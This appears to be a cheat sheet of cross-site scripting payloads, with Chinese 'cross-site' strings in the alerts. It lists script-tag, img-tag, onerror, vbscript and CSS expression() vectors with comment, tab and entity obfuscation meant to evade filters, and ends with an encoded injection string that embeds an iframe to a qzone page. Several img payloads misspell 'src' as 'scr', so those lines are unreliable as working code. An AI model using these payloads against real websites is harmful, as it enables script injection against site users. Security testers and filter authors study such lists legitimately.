<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["